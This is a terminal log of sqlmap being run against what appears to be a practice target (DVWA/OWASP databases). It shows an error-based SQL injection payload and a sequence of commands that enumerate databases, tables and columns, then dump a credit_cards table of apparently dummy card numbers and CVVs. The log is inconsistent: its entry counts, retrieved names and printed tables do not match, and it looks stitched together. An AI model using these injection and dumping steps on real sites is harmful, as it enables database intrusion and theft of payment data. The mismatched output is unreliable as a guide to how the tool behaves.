┌──(kali㉿kali)-[~/Downloads]
└─$ sqlmap -r extract.txt --dbs
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.6#stable}
|_ -| . ["]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[*] starting at 12:12:56
[12:12:56] [INFO] resuming back-end DBMS 'mysql'
[12:12:57] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[12:13:00] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:13:00] [INFO] fetching database names
[12:13:00] [INFO] the SQL query used returns 2 entries
[12:13:00] [INFO] resumed: dvwa
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: metasploit
[12:13:00] [INFO] resumed: mysql
[12:13:00] [INFO] resumed: owasp10
[12:13:00] [INFO] resumed: tikiwiki
[12:13:00] [INFO] resumed: tikiwiki95
available databases [2]:
[*] dvwa
[*] information_schema
[*] metasploit
[*] mysql
[*] owasp10
[*] tikiwiki
[*] tikiwiki95

┌──(kali㉿kali)-[~/Downloads]
└─$ python sqlmap.py -r extract.txt --tables -D owasp10

[11:55:18] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[11:55:18] [INFO] fetching tables for database: 'owasp10'
[11:55:19] [INFO] heuristics detected web page charset 'ascii'
[11:55:19] [INFO] the SQL query used returns 216 entries
[11:55:20] [INFO] retrieved: acl_acl
[11:55:21] [INFO] retrieved: acl_acl_sections

+----------------+
| accounts       |
| blog_tabel     |
| captured_data  |
| credit_cards   |
| hitlog         |
| permission     |
| pen_test_tools |
+----------------+


┌──(kali㉿kali)-[~/Downloads]
└─$ python sqlmap.py -r extract.txt --columns -D owasp10 -T credit_cards

[12:17:39] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5
[12:17:39] [INFO] fetching columns for table 'credit_cards' in database 'owasp10'
[12:17:41] [INFO] heuristics detected web page charset 'ascii'
[12:17:41] [INFO] the SQL query used returns 5 entries
[12:17:42] [INFO] retrieved: ccid
[12:17:43] [INFO] retrieved: ccv
[12:17:45] [INFO] retrieved: ccnumber
[12:17:46] [INFO] retrieved: expiration
Database: owasp10
Table: credit_cards
[5 entries]
+---------+------+-------------------+------------+
| ccid    | ccv  | ccnumber          | expiration |
+---------+------+-------------------+------------+
| 1       | 745  | 45147854457841235 | 2012-03-01 |
| 2       | 722  | 95778855998521457 | 2013-12-20 |
| 3       | 461  | 85841235458855451 | 2016-10-12 |
| 4       | 230  | 14578545552265656 | 2011-04-03 |
| 5       | 627  | 45649878451231554 | 2015-06-16 |
+---------+------+-----------+-------+------------+